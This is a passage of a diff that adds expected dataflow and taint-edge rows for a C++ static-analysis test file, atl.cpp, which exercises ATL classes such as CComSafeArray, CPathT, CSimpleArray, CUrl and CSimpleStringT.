+| atl.cpp:595:26:595:26 | call to CComSafeArray | atl.cpp:598:12:598:12 | c | | +| atl.cpp:595:26:595:26 | call to CComSafeArray | atl.cpp:599:12:599:12 | c | | +| atl.cpp:595:26:595:26 | call to CComSafeArray | atl.cpp:600:5:600:5 | c | | +| atl.cpp:596:7:596:7 | ref arg c | atl.cpp:597:12:597:12 | c | | +| atl.cpp:596:7:596:7 | ref arg c | atl.cpp:598:12:598:12 | c | | +| atl.cpp:596:7:596:7 | ref arg c | atl.cpp:599:12:599:12 | c | | +| atl.cpp:596:7:596:7 | ref arg c | atl.cpp:600:5:600:5 | c | | +| atl.cpp:597:12:597:12 | ref arg c | atl.cpp:598:12:598:12 | c | | +| atl.cpp:597:12:597:12 | ref arg c | atl.cpp:599:12:599:12 | c | | +| atl.cpp:597:12:597:12 | ref arg c | atl.cpp:600:5:600:5 | c | | +| atl.cpp:598:12:598:12 | ref arg c | atl.cpp:599:12:599:12 | c | | +| atl.cpp:598:12:598:12 | ref arg c | atl.cpp:600:5:600:5 | c | | +| atl.cpp:599:12:599:12 | ref arg c | atl.cpp:600:5:600:5 | c | | +| atl.cpp:602:26:602:26 | call to CComSafeArray | atl.cpp:603:7:603:7 | c | | +| atl.cpp:602:26:602:26 | call to CComSafeArray | atl.cpp:604:12:604:12 | c | | +| atl.cpp:602:26:602:26 | call to CComSafeArray | atl.cpp:605:12:605:12 | c | | +| atl.cpp:602:26:602:26 | call to CComSafeArray | atl.cpp:606:5:606:5 | c | | +| atl.cpp:603:7:603:7 | ref arg c | atl.cpp:604:12:604:12 | c | | +| atl.cpp:603:7:603:7 | ref arg c | atl.cpp:605:12:605:12 | c | | +| atl.cpp:603:7:603:7 | ref arg c | atl.cpp:606:5:606:5 | c | | +| atl.cpp:604:12:604:12 | ref arg c | atl.cpp:605:12:605:12 | c | | +| atl.cpp:604:12:604:12 | ref arg c | atl.cpp:606:5:606:5 | c | | +| atl.cpp:605:12:605:12 | ref arg c | atl.cpp:606:5:606:5 | c | | +| atl.cpp:667:15:667:35 | call to indirect_source | atl.cpp:668:13:668:13 | x | | +| atl.cpp:667:15:667:35 | call to indirect_source | atl.cpp:677:22:677:22 | x | | +| atl.cpp:667:15:667:35 | call to indirect_source | atl.cpp:682:16:682:16 | x | | +| atl.cpp:667:15:667:35 | call to indirect_source | atl.cpp:690:13:690:13 | x | | +| atl.cpp:667:15:667:35 | call to indirect_source | atl.cpp:696:17:696:17 | x | | +| atl.cpp:667:15:667:35 | call to indirect_source | atl.cpp:701:26:701:26 | x | | +| atl.cpp:667:15:667:35 | call to indirect_source | atl.cpp:707:32:707:32 | x | | +| atl.cpp:668:13:668:13 | ref arg x | atl.cpp:677:22:677:22 | x | | +| atl.cpp:668:13:668:13 | ref arg x | atl.cpp:682:16:682:16 | x | | +| atl.cpp:668:13:668:13 | ref arg x | atl.cpp:690:13:690:13 | x | | +| atl.cpp:668:13:668:13 | ref arg x | atl.cpp:696:17:696:17 | x | | +| atl.cpp:668:13:668:13 | ref arg x | atl.cpp:701:26:701:26 | x | | +| atl.cpp:668:13:668:13 | ref arg x | atl.cpp:707:32:707:32 | x | | +| atl.cpp:668:13:668:13 | x | atl.cpp:668:13:668:14 | call to CPathT | TAINT | +| atl.cpp:668:13:668:14 | call to CPathT | atl.cpp:669:29:669:29 | p | | +| atl.cpp:668:13:668:14 | call to CPathT | atl.cpp:670:10:670:10 | p | | +| atl.cpp:668:13:668:14 | call to CPathT | atl.cpp:672:14:672:14 | p | | +| atl.cpp:669:29:669:29 | ref arg p | atl.cpp:670:10:670:10 | p | | +| atl.cpp:669:29:669:29 | ref arg p | atl.cpp:672:14:672:14 | p | | +| atl.cpp:670:10:670:10 | p [post update] | atl.cpp:672:14:672:14 | p | | +| atl.cpp:670:12:670:20 | ref arg m_strPath | atl.cpp:673:13:673:21 | m_strPath | | +| atl.cpp:672:14:672:14 | p | atl.cpp:672:14:672:15 | call to CPathT | | +| atl.cpp:672:14:672:15 | call to CPathT | atl.cpp:673:10:673:11 | p2 | | +| atl.cpp:676:13:676:13 | call to CPathT | atl.cpp:677:7:677:7 | p | | +| atl.cpp:676:13:676:13 | call to CPathT | atl.cpp:678:12:678:12 | p | | +| atl.cpp:677:7:677:7 | ref arg p | atl.cpp:678:12:678:12 | p | | +| atl.cpp:677:22:677:22 | ref arg x | atl.cpp:682:16:682:16 | x | | +| atl.cpp:677:22:677:22 | ref arg x | atl.cpp:690:13:690:13 | x | | +| atl.cpp:677:22:677:22 | ref arg x | atl.cpp:696:17:696:17 | x | | +| atl.cpp:677:22:677:22 | ref arg x | atl.cpp:701:26:701:26 | x | | +| atl.cpp:677:22:677:22 | ref arg x | atl.cpp:707:32:707:32 | x | | +| atl.cpp:681:13:681:13 | call to CPathT | atl.cpp:682:7:682:7 | p | | +| atl.cpp:681:13:681:13 | call to CPathT | atl.cpp:683:12:683:12 | p | | +| atl.cpp:681:13:681:13 | call to CPathT | atl.cpp:686:13:686:13 | p | | +| atl.cpp:682:7:682:7 | ref arg p | atl.cpp:683:12:683:12 | p | | +| atl.cpp:682:7:682:7 | ref arg p | atl.cpp:686:13:686:13 | p | | +| atl.cpp:682:16:682:16 | ref arg x | atl.cpp:690:13:690:13 | x | | +| atl.cpp:682:16:682:16 | ref arg x | atl.cpp:696:17:696:17 | x | | +| atl.cpp:682:16:682:16 | ref arg x | atl.cpp:701:26:701:26 | x | | +| atl.cpp:682:16:682:16 | ref arg x | atl.cpp:707:32:707:32 | x | | +| atl.cpp:683:12:683:12 | p [post update] | atl.cpp:686:13:686:13 | p | | +| atl.cpp:685:13:685:14 | call to CPathT | atl.cpp:686:7:686:8 | p2 | | +| atl.cpp:685:13:685:14 | call to CPathT | atl.cpp:687:12:687:13 | p2 | | +| atl.cpp:686:7:686:8 | ref arg p2 | atl.cpp:687:12:687:13 | p2 | | +| atl.cpp:686:13:686:13 | call to operator char *& | atl.cpp:686:10:686:10 | call to operator+= | TAINT | +| atl.cpp:689:13:689:14 | call to CPathT | atl.cpp:690:7:690:8 | p3 | | +| atl.cpp:689:13:689:14 | call to CPathT | atl.cpp:691:12:691:13 | p3 | | +| atl.cpp:690:7:690:8 | ref arg p3 | atl.cpp:691:12:691:13 | p3 | | +| atl.cpp:690:13:690:13 | ref arg x | atl.cpp:696:17:696:17 | x | | +| atl.cpp:690:13:690:13 | ref arg x | atl.cpp:701:26:701:26 | x | | +| atl.cpp:690:13:690:13 | ref arg x | atl.cpp:707:32:707:32 | x | | +| atl.cpp:690:13:690:13 | x | atl.cpp:690:10:690:10 | call to operator+= | TAINT | +| atl.cpp:695:13:695:13 | call to CPathT | atl.cpp:696:7:696:7 | p | | +| atl.cpp:695:13:695:13 | call to CPathT | atl.cpp:697:12:697:12 | p | | +| atl.cpp:696:7:696:7 | ref arg p | atl.cpp:697:12:697:12 | p | | +| atl.cpp:696:17:696:17 | ref arg x | atl.cpp:701:26:701:26 | x | | +| atl.cpp:696:17:696:17 | ref arg x | atl.cpp:707:32:707:32 | x | | +| atl.cpp:700:13:700:13 | call to CPathT | atl.cpp:701:7:701:7 | p | | +| atl.cpp:700:13:700:13 | call to CPathT | atl.cpp:702:12:702:12 | p | | +| atl.cpp:701:7:701:7 | ref arg p | atl.cpp:702:12:702:12 | p | | +| atl.cpp:701:26:701:26 | ref arg x | atl.cpp:707:32:707:32 | x | | +| atl.cpp:706:13:706:13 | call to CPathT | atl.cpp:707:17:707:17 | p | | +| atl.cpp:707:19:707:30 | call to CommonPrefix | atl.cpp:708:12:708:13 | p2 | | +| atl.cpp:707:19:707:30 | call to CommonPrefix | atl.cpp:709:12:709:13 | p2 | | +| atl.cpp:708:12:708:13 | p2 [post update] | atl.cpp:709:12:709:13 | p2 | | +| atl.cpp:736:13:736:23 | call to source | atl.cpp:739:13:739:13 | x | | +| atl.cpp:736:13:736:23 | call to source | atl.cpp:751:13:751:13 | x | | +| atl.cpp:736:13:736:23 | call to source | atl.cpp:755:25:755:25 | x | | +| atl.cpp:738:25:738:25 | call to CSimpleArray | atl.cpp:739:7:739:7 | a | | +| atl.cpp:738:25:738:25 | call to CSimpleArray | atl.cpp:740:12:740:12 | a | | +| atl.cpp:738:25:738:25 | call to CSimpleArray | atl.cpp:741:7:741:7 | a | | +| atl.cpp:738:25:738:25 | call to CSimpleArray | atl.cpp:742:12:742:12 | a | | +| atl.cpp:738:25:738:25 | call to CSimpleArray | atl.cpp:746:12:746:12 | a | | +| atl.cpp:738:25:738:25 | call to CSimpleArray | atl.cpp:748:5:748:5 | a | | +| atl.cpp:739:7:739:7 | ref arg a | atl.cpp:740:12:740:12 | a | | +| atl.cpp:739:7:739:7 | ref arg a | atl.cpp:741:7:741:7 | a | | +| atl.cpp:739:7:739:7 | ref arg a | atl.cpp:742:12:742:12 | a | | +| atl.cpp:739:7:739:7 | ref arg a | atl.cpp:746:12:746:12 | a | | +| atl.cpp:739:7:739:7 | ref arg a | atl.cpp:748:5:748:5 | a | | +| atl.cpp:740:12:740:12 | ref arg a | atl.cpp:741:7:741:7 | a | | +| atl.cpp:740:12:740:12 | ref arg a | atl.cpp:742:12:742:12 | a | | +| atl.cpp:740:12:740:12 | ref arg a | atl.cpp:746:12:746:12 | a | | +| atl.cpp:740:12:740:12 | ref arg a | atl.cpp:748:5:748:5 | a | | +| atl.cpp:741:7:741:7 | ref arg a | atl.cpp:742:12:742:12 | a | | +| atl.cpp:741:7:741:7 | ref arg a | atl.cpp:746:12:746:12 | a | | +| atl.cpp:741:7:741:7 | ref arg a | atl.cpp:748:5:748:5 | a | | +| atl.cpp:742:12:742:12 | ref arg a | atl.cpp:746:12:746:12 | a | | +| atl.cpp:742:12:742:12 | ref arg a | atl.cpp:748:5:748:5 | a | | +| atl.cpp:744:25:744:26 | call to CSimpleArray | atl.cpp:745:12:745:13 | a2 | | +| atl.cpp:744:25:744:26 | call to CSimpleArray | atl.cpp:746:7:746:8 | a2 | | +| atl.cpp:744:25:744:26 | call to CSimpleArray | atl.cpp:747:12:747:13 | a2 | | +| atl.cpp:744:25:744:26 | call to CSimpleArray | atl.cpp:748:5:748:5 | a2 | | +| atl.cpp:745:12:745:13 | ref arg a2 | atl.cpp:746:7:746:8 | a2 | | +| atl.cpp:745:12:745:13 | ref arg a2 | atl.cpp:747:12:747:13 | a2 | | +| atl.cpp:745:12:745:13 | ref arg a2 | atl.cpp:748:5:748:5 | a2 | | +| atl.cpp:746:7:746:8 | ref arg a2 | atl.cpp:747:12:747:13 | a2 | | +| atl.cpp:746:7:746:8 | ref arg a2 | atl.cpp:748:5:748:5 | a2 | | +| atl.cpp:746:12:746:12 | a | atl.cpp:746:7:746:8 | ref arg a2 | TAINT | +| atl.cpp:746:12:746:12 | a | atl.cpp:746:10:746:10 | call to operator= | TAINT | +| atl.cpp:747:12:747:13 | ref arg a2 | atl.cpp:748:5:748:5 | a2 | | +| atl.cpp:750:25:750:25 | call to CSimpleArray | atl.cpp:751:7:751:7 | a | | +| atl.cpp:750:25:750:25 | call to CSimpleArray | atl.cpp:752:12:752:12 | a | | +| atl.cpp:750:25:750:25 | call to CSimpleArray | atl.cpp:757:5:757:5 | a | | +| atl.cpp:751:7:751:7 | ref arg a | atl.cpp:752:12:752:12 | a | | +| atl.cpp:751:7:751:7 | ref arg a | atl.cpp:757:5:757:5 | a | | +| atl.cpp:752:12:752:12 | ref arg a | atl.cpp:757:5:757:5 | a | | +| atl.cpp:754:25:754:26 | call to CSimpleArray | atl.cpp:755:17:755:18 | a2 | | +| atl.cpp:754:25:754:26 | call to CSimpleArray | atl.cpp:756:12:756:13 | a2 | | +| atl.cpp:754:25:754:26 | call to CSimpleArray | atl.cpp:757:5:757:5 | a2 | | +| atl.cpp:755:20:755:23 | call to Find | atl.cpp:756:15:756:17 | pos | | +| atl.cpp:756:12:756:13 | ref arg a2 | atl.cpp:757:5:757:5 | a2 | | +| atl.cpp:781:18:781:33 | call to source | atl.cpp:784:22:784:22 | x | | +| atl.cpp:781:18:781:33 | call to source | atl.cpp:794:28:794:28 | x | | +| atl.cpp:781:18:781:33 | call to source | atl.cpp:799:34:799:34 | x | | +| atl.cpp:781:18:781:33 | call to source | atl.cpp:805:24:805:24 | x | | +| atl.cpp:781:18:781:33 | call to source | atl.cpp:810:32:810:32 | x | | +| atl.cpp:783:35:783:35 | call to CSimpleMap | atl.cpp:784:7:784:7 | a | | +| atl.cpp:783:35:783:35 | call to CSimpleMap | atl.cpp:785:12:785:12 | a | | +| atl.cpp:783:35:783:35 | call to CSimpleMap | atl.cpp:786:5:786:5 | a | | +| atl.cpp:784:7:784:7 | ref arg a | atl.cpp:785:12:785:12 | a | | +| atl.cpp:784:7:784:7 | ref arg a | atl.cpp:786:5:786:5 | a | | +| atl.cpp:785:12:785:12 | ref arg a | atl.cpp:786:5:786:5 | a | | +| atl.cpp:788:35:788:35 | call to CSimpleMap | atl.cpp:789:18:789:18 | a | | +| atl.cpp:788:35:788:35 | call to CSimpleMap | atl.cpp:790:12:790:12 | a | | +| atl.cpp:788:35:788:35 | call to CSimpleMap | atl.cpp:791:5:791:5 | a | | +| atl.cpp:789:20:789:26 | call to FindKey | atl.cpp:790:25:790:27 | pos | | +| atl.cpp:790:12:790:12 | ref arg a | atl.cpp:791:5:791:5 | a | | +| atl.cpp:793:35:793:35 | call to CSimpleMap | atl.cpp:794:18:794:18 | a | | +| atl.cpp:793:35:793:35 | call to CSimpleMap | atl.cpp:795:12:795:12 | a | | +| atl.cpp:793:35:793:35 | call to CSimpleMap | atl.cpp:796:5:796:5 | a | | +| atl.cpp:794:20:794:26 | call to FindVal | atl.cpp:795:25:795:27 | pos | | +| atl.cpp:795:12:795:12 | ref arg a | atl.cpp:796:5:796:5 | a | | +| atl.cpp:798:35:798:35 | call to CSimpleMap | atl.cpp:799:18:799:18 | a | | +| atl.cpp:798:35:798:35 | call to CSimpleMap | atl.cpp:801:12:801:12 | a | | +| atl.cpp:798:35:798:35 | call to CSimpleMap | atl.cpp:802:5:802:5 | a | | +| atl.cpp:799:18:799:18 | ref arg a | atl.cpp:801:12:801:12 | a | | +| atl.cpp:799:18:799:18 | ref arg a | atl.cpp:802:5:802:5 | a | | +| atl.cpp:799:20:799:32 | call to ReverseLookup | atl.cpp:800:12:800:14 | key | | +| atl.cpp:799:20:799:32 | call to ReverseLookup | atl.cpp:801:21:801:23 | key | | +| atl.cpp:800:12:800:14 | ref arg key | atl.cpp:801:21:801:23 | key | | +| atl.cpp:801:12:801:12 | ref arg a | atl.cpp:802:5:802:5 | a | | +| atl.cpp:804:35:804:35 | call to CSimpleMap | atl.cpp:805:7:805:7 | a | | +| atl.cpp:804:35:804:35 | call to CSimpleMap | atl.cpp:806:12:806:12 | a | | +| atl.cpp:804:35:804:35 | call to CSimpleMap | atl.cpp:807:5:807:5 | a | | +| atl.cpp:805:7:805:7 | ref arg a | atl.cpp:806:12:806:12 | a | | +| atl.cpp:805:7:805:7 | ref arg a | atl.cpp:807:5:807:5 | a | | +| atl.cpp:806:12:806:12 | ref arg a | atl.cpp:807:5:807:5 | a | | +| atl.cpp:809:35:809:35 | call to CSimpleMap | atl.cpp:810:7:810:7 | a | | +| atl.cpp:809:35:809:35 | call to CSimpleMap | atl.cpp:811:12:811:12 | a | | +| atl.cpp:809:35:809:35 | call to CSimpleMap | atl.cpp:812:5:812:5 | a | | +| atl.cpp:810:7:810:7 | ref arg a | atl.cpp:811:12:811:12 | a | | +| atl.cpp:810:7:810:7 | ref arg a | atl.cpp:812:5:812:5 | a | | +| atl.cpp:811:12:811:12 | ref arg a | atl.cpp:812:5:812:5 | a | | +| atl.cpp:853:15:853:35 | call to indirect_source | atl.cpp:855:18:855:18 | x | | +| atl.cpp:853:15:853:35 | call to indirect_source | atl.cpp:868:21:868:21 | x | | +| atl.cpp:853:15:853:35 | call to indirect_source | atl.cpp:874:25:874:25 | x | | +| atl.cpp:853:15:853:35 | call to indirect_source | atl.cpp:879:24:879:24 | x | | +| atl.cpp:853:15:853:35 | call to indirect_source | atl.cpp:884:24:884:24 | x | | +| atl.cpp:853:15:853:35 | call to indirect_source | atl.cpp:889:26:889:26 | x | | +| atl.cpp:853:15:853:35 | call to indirect_source | atl.cpp:894:23:894:23 | x | | +| atl.cpp:853:15:853:35 | call to indirect_source | atl.cpp:899:24:899:24 | x | | +| atl.cpp:854:10:854:12 | call to CUrl | atl.cpp:855:5:855:7 | url | | +| atl.cpp:854:10:854:12 | call to CUrl | atl.cpp:856:10:856:12 | url | | +| atl.cpp:854:10:854:12 | call to CUrl | atl.cpp:857:10:857:12 | url | | +| atl.cpp:854:10:854:12 | call to CUrl | atl.cpp:858:10:858:12 | url | | +| atl.cpp:854:10:854:12 | call to CUrl | atl.cpp:859:10:859:12 | url | | +| atl.cpp:854:10:854:12 | call to CUrl | atl.cpp:860:10:860:12 | url | | +| atl.cpp:854:10:854:12 | call to CUrl | atl.cpp:861:10:861:12 | url | | +| atl.cpp:854:10:854:12 | call to CUrl | atl.cpp:862:10:862:12 | url | | +| atl.cpp:854:10:854:12 | call to CUrl | atl.cpp:902:3:902:3 | url | | +| atl.cpp:855:5:855:7 | ref arg url | atl.cpp:856:10:856:12 | url | | +| atl.cpp:855:5:855:7 | ref arg url | atl.cpp:857:10:857:12 | url | | +| atl.cpp:855:5:855:7 | ref arg url | atl.cpp:858:10:858:12 | url | | +| atl.cpp:855:5:855:7 | ref arg url | atl.cpp:859:10:859:12 | url | | +| atl.cpp:855:5:855:7 | ref arg url | atl.cpp:860:10:860:12 | url | | +| atl.cpp:855:5:855:7 | ref arg url | atl.cpp:861:10:861:12 | url | | +| atl.cpp:855:5:855:7 | ref arg url | atl.cpp:862:10:862:12 | url | | +| atl.cpp:855:5:855:7 | ref arg url | atl.cpp:902:3:902:3 | url | | +| atl.cpp:865:12:865:15 | call to CUrl | atl.cpp:868:7:868:10 | url2 | | +| atl.cpp:865:12:865:15 | call to CUrl | atl.cpp:869:7:869:10 | url2 | | +| atl.cpp:865:12:865:15 | call to CUrl | atl.cpp:871:5:871:5 | url2 | | +| atl.cpp:866:13:866:15 | len | atl.cpp:869:31:869:33 | len | | +| atl.cpp:867:12:867:17 | buffer | atl.cpp:869:22:869:27 | buffer | | +| atl.cpp:867:12:867:17 | buffer | atl.cpp:870:12:870:17 | buffer | | +| atl.cpp:868:7:868:10 | ref arg url2 | atl.cpp:869:7:869:10 | url2 | | +| atl.cpp:868:7:868:10 | ref arg url2 | atl.cpp:871:5:871:5 | url2 | | +| atl.cpp:869:22:869:27 | ref arg buffer | atl.cpp:870:12:870:17 | buffer | | +| atl.cpp:869:30:869:33 | ref arg & ... | atl.cpp:869:31:869:33 | len [inner post update] | | +| atl.cpp:869:31:869:33 | len | atl.cpp:869:30:869:33 | & ... | | +| atl.cpp:873:12:873:15 | call to CUrl | atl.cpp:874:7:874:10 | url2 | | +| atl.cpp:873:12:873:15 | call to CUrl | atl.cpp:875:12:875:15 | url2 | | +| atl.cpp:873:12:873:15 | call to CUrl | atl.cpp:876:5:876:5 | url2 | | +| atl.cpp:874:7:874:10 | ref arg url2 | atl.cpp:875:12:875:15 | url2 | | +| atl.cpp:874:7:874:10 | ref arg url2 | atl.cpp:876:5:876:5 | url2 | | +| atl.cpp:878:12:878:15 | call to CUrl | atl.cpp:879:7:879:10 | url2 | | +| atl.cpp:878:12:878:15 | call to CUrl | atl.cpp:880:12:880:15 | url2 | | +| atl.cpp:878:12:878:15 | call to CUrl | atl.cpp:881:5:881:5 | url2 | | +| atl.cpp:879:7:879:10 | ref arg url2 | atl.cpp:880:12:880:15 | url2 | | +| atl.cpp:879:7:879:10 | ref arg url2 | atl.cpp:881:5:881:5 | url2 | | +| atl.cpp:883:12:883:15 | call to CUrl | atl.cpp:884:7:884:10 | url2 | | +| atl.cpp:883:12:883:15 | call to CUrl | atl.cpp:885:12:885:15 | url2 | | +| atl.cpp:883:12:883:15 | call to CUrl | atl.cpp:886:5:886:5 | url2 | | +| atl.cpp:884:7:884:10 | ref arg url2 | atl.cpp:885:12:885:15 | url2 | | +| atl.cpp:884:7:884:10 | ref arg url2 | atl.cpp:886:5:886:5 | url2 | | +| atl.cpp:888:12:888:15 | call to CUrl | atl.cpp:889:7:889:10 | url2 | | +| atl.cpp:888:12:888:15 | call to CUrl | atl.cpp:890:12:890:15 | url2 | | +| atl.cpp:888:12:888:15 | call to CUrl | atl.cpp:891:5:891:5 | url2 | | +| atl.cpp:889:7:889:10 | ref arg url2 | atl.cpp:890:12:890:15 | url2 | | +| atl.cpp:889:7:889:10 | ref arg url2 | atl.cpp:891:5:891:5 | url2 | | +| atl.cpp:893:12:893:15 | call to CUrl | atl.cpp:894:7:894:10 | url2 | | +| atl.cpp:893:12:893:15 | call to CUrl | atl.cpp:895:12:895:15 | url2 | | +| atl.cpp:893:12:893:15 | call to CUrl | atl.cpp:896:5:896:5 | url2 | | +| atl.cpp:894:7:894:10 | ref arg url2 | atl.cpp:895:12:895:15 | url2 | | +| atl.cpp:894:7:894:10 | ref arg url2 | atl.cpp:896:5:896:5 | url2 | | +| atl.cpp:898:12:898:15 | call to CUrl | atl.cpp:899:7:899:10 | url2 | | +| atl.cpp:898:12:898:15 | call to CUrl | atl.cpp:900:12:900:15 | url2 | | +| atl.cpp:898:12:898:15 | call to CUrl | atl.cpp:901:5:901:5 | url2 | | +| atl.cpp:899:7:899:10 | ref arg url2 | atl.cpp:900:12:900:15 | url2 | | +| atl.cpp:899:7:899:10 | ref arg url2 | atl.cpp:901:5:901:5 | url2 | | +| atl.cpp:955:15:955:35 | call to indirect_source | atl.cpp:957:29:957:29 | x | | +| atl.cpp:955:15:955:35 | call to indirect_source | atl.cpp:960:29:960:29 | x | | +| atl.cpp:955:15:955:35 | call to indirect_source | atl.cpp:979:46:979:46 | x | | +| atl.cpp:955:15:955:35 | call to indirect_source | atl.cpp:983:51:983:51 | x | | +| atl.cpp:955:15:955:35 | call to indirect_source | atl.cpp:987:56:987:56 | x | | +| atl.cpp:957:29:957:43 | call to CSimpleStringT | atl.cpp:958:10:958:11 | s1 | | +| atl.cpp:957:29:957:43 | call to CSimpleStringT | atl.cpp:1009:52:1009:53 | s1 | | +| atl.cpp:957:29:957:43 | call to CSimpleStringT | atl.cpp:1011:10:1011:11 | s1 | | +| atl.cpp:957:29:957:43 | call to CSimpleStringT | atl.cpp:1012:3:1012:3 | s1 | | +| atl.cpp:960:29:960:39 | call to CSimpleStringT | atl.cpp:961:10:961:11 | s2 | | +| atl.cpp:960:29:960:39 | call to CSimpleStringT | atl.cpp:963:29:963:30 | s2 | | +| atl.cpp:960:29:960:39 | call to CSimpleStringT | atl.cpp:1012:3:1012:3 | s2 | | +| atl.cpp:963:29:963:30 | s2 | atl.cpp:963:29:963:31 | call to CSimpleStringT | | +| atl.cpp:963:29:963:31 | call to CSimpleStringT | atl.cpp:964:10:964:11 | s3 | | +| atl.cpp:963:29:963:31 | call to CSimpleStringT | atl.cpp:1012:3:1012:3 | s3 | | +| atl.cpp:966:26:966:27 | call to CSimpleStringT | atl.cpp:967:5:967:6 | s4 | | +| atl.cpp:966:26:966:27 | call to CSimpleStringT | atl.cpp:968:10:968:11 | s4 | | +| atl.cpp:966:26:966:27 | call to CSimpleStringT | atl.cpp:971:15:971:16 | s4 | | +| atl.cpp:966:26:966:27 | call to CSimpleStringT | atl.cpp:990:10:990:11 | s4 | | +| atl.cpp:966:26:966:27 | call to CSimpleStringT | atl.cpp:991:10:991:11 | s4 | | +| atl.cpp:966:26:966:27 | call to CSimpleStringT | atl.cpp:992:10:992:11 | s4 | | +| atl.cpp:966:26:966:27 | call to CSimpleStringT | atl.cpp:993:10:993:11 | s4 | | +| atl.cpp:966:26:966:27 | call to CSimpleStringT | atl.cpp:995:10:995:11 | s4 | | +| atl.cpp:966:26:966:27 | call to CSimpleStringT | atl.cpp:1012:3:1012:3 | s4 | | +| atl.cpp:967:5:967:6 | ref arg s4 | atl.cpp:968:10:968:11 | s4 | | +| atl.cpp:967:5:967:6 | ref arg s4 | atl.cpp:971:15:971:16 | s4 | | +| atl.cpp:967:5:967:6 | ref arg s4 | atl.cpp:990:10:990:11 | s4 | | +| atl.cpp:967:5:967:6 | ref arg s4 | atl.cpp:991:10:991:11 | s4 | | +| atl.cpp:967:5:967:6 | ref arg s4 | atl.cpp:992:10:992:11 | s4 | | +| atl.cpp:967:5:967:6 | ref arg s4 | atl.cpp:993:10:993:11 | s4 | | +| atl.cpp:967:5:967:6 | ref arg s4 | atl.cpp:995:10:995:11 | s4 | | +| atl.cpp:967:5:967:6 | ref arg s4 | atl.cpp:1012:3:1012:3 | s4 | | +| atl.cpp:970:26:970:27 | call to CSimpleStringT | atl.cpp:971:5:971:6 | s5 | | +| atl.cpp:970:26:970:27 | call to CSimpleStringT | atl.cpp:972:10:972:11 | s5 | | +| atl.cpp:970:26:970:27 | call to CSimpleStringT | atl.cpp:1012:3:1012:3 | s5 | | +| atl.cpp:971:5:971:6 | ref arg s5 | atl.cpp:972:10:972:11 | s5 | | +| atl.cpp:971:5:971:6 | ref arg s5 | atl.cpp:1012:3:1012:3 | s5 | | +| atl.cpp:974:26:974:27 | call to CSimpleStringT | atl.cpp:975:5:975:6 | s6 | | +| atl.cpp:974:26:974:27 | call to CSimpleStringT | atl.cpp:976:10:976:11 | s6 | | +| atl.cpp:974:26:974:27 | call to CSimpleStringT | atl.cpp:1012:3:1012:3 | s6 | | +| atl.cpp:975:5:975:6 | ref arg s6 | atl.cpp:976:10:976:11 | s6 | | +| atl.cpp:975:5:975:6 | ref arg s6 | atl.cpp:1012:3:1012:3 | s6 | | +| atl.cpp:978:10:978:16 | buffer1 | atl.cpp:979:37:979:43 | buffer1 | | +| atl.cpp:978:10:978:16 | buffer1 | atl.cpp:980:10:980:16 | buffer1 | | +| atl.cpp:979:37:979:43 | ref arg buffer1 | atl.cpp:980:10:980:16 | buffer1 | | +| atl.cpp:982:10:982:16 | buffer2 | atl.cpp:983:37:983:43 | buffer2 | | +| atl.cpp:982:10:982:16 | buffer2 | atl.cpp:984:10:984:16 | buffer2 | | +| atl.cpp:983:37:983:43 | ref arg buffer2 | atl.cpp:984:10:984:16 | buffer2 | | +| atl.cpp:986:10:986:16 | buffer3 | atl.cpp:987:47:987:53 | buffer3 | | +| atl.cpp:986:10:986:16 | buffer3 | atl.cpp:988:10:988:16 | buffer3 | | +| atl.cpp:987:47:987:53 | ref arg buffer3 | atl.cpp:988:10:988:16 | buffer3 | | +| atl.cpp:991:10:991:11 | ref arg s4 | atl.cpp:992:10:992:11 | s4 | | +| atl.cpp:991:10:991:11 | ref arg s4 | atl.cpp:993:10:993:11 | s4 | | +| atl.cpp:991:10:991:11 | ref arg s4 | atl.cpp:995:10:995:11 | s4 | | +| atl.cpp:991:10:991:11 | ref arg s4 | atl.cpp:1012:3:1012:3 | s4 | | +| atl.cpp:992:10:992:11 | ref arg s4 | atl.cpp:993:10:993:11 | s4 | | +| atl.cpp:992:10:992:11 | ref arg s4 | atl.cpp:995:10:995:11 | s4 | | +| atl.cpp:992:10:992:11 | ref arg s4 | atl.cpp:1012:3:1012:3 | s4 | | +| atl.cpp:993:10:993:11 | ref arg s4 | atl.cpp:995:10:995:11 | s4 | | +| atl.cpp:993:10:993:11 | ref arg s4 | atl.cpp:1012:3:1012:3 | s4 | | +| atl.cpp:995:10:995:11 | ref arg s4 | atl.cpp:1012:3:1012:3 | s4 | | +| atl.cpp:997:26:997:27 | call to CSimpleStringT | atl.cpp:998:5:998:6 | s7 | | +| atl.cpp:997:26:997:27 | call to CSimpleStringT | atl.cpp:999:10:999:11 | s7 | | +| atl.cpp:997:26:997:27 | call to CSimpleStringT | atl.cpp:1012:3:1012:3 | s7 | | +| atl.cpp:998:5:998:6 | ref arg s7 | atl.cpp:999:10:999:11 | s7 | | +| atl.cpp:998:5:998:6 | ref arg s7 | atl.cpp:1012:3:1012:3 | s7 | | +| atl.cpp:1001:26:1001:27 | call to CSimpleStringT | atl.cpp:1002:5:1002:6 | s8 | | +| atl.cpp:1001:26:1001:27 | call to CSimpleStringT | atl.cpp:1003:10:1003:11 | s8 | | +| atl.cpp:1001:26:1001:27 | call to CSimpleStringT | atl.cpp:1012:3:1012:3 | s8 | | +| atl.cpp:1002:5:1002:6 | ref arg s8 | atl.cpp:1003:10:1003:11 | s8 | | +| atl.cpp:1002:5:1002:6 | ref arg s8 | atl.cpp:1012:3:1012:3 | s8 | | +| atl.cpp:1005:26:1005:27 | call to CSimpleStringT | atl.cpp:1006:5:1006:6 | s9 | | +| atl.cpp:1005:26:1005:27 | call to CSimpleStringT | atl.cpp:1007:10:1007:11 | s9 | | +| atl.cpp:1005:26:1005:27 | call to CSimpleStringT | atl.cpp:1012:3:1012:3 | s9 | | +| atl.cpp:1006:5:1006:6 | ref arg s9 | atl.cpp:1007:10:1007:11 | s9 | | +| atl.cpp:1006:5:1006:6 | ref arg s9 | atl.cpp:1012:3:1012:3 | s9 | | +| atl.cpp:1100:17:1100:31 | call to source | atl.cpp:1102:23:1102:23 | v | | +| atl.cpp:1100:17:1100:31 | call to source | atl.cpp:1105:23:1105:23 | v | | +| atl.cpp:1102:23:1102:23 | v | atl.cpp:1102:23:1102:24 | call to CStringT | TAINT | +| atl.cpp:1102:23:1102:24 | call to CStringT | atl.cpp:1103:10:1103:11 | s1 | | +| atl.cpp:1102:23:1102:24 | call to CStringT | atl.cpp:1137:45:1137:46 | s1 | | +| atl.cpp:1102:23:1102:24 | call to CStringT | atl.cpp:1139:17:1139:18 | s1 | | +| atl.cpp:1102:23:1102:24 | call to CStringT | atl.cpp:1173:10:1173:11 | s1 | | +| atl.cpp:1102:23:1102:24 | call to CStringT | atl.cpp:1179:10:1179:11 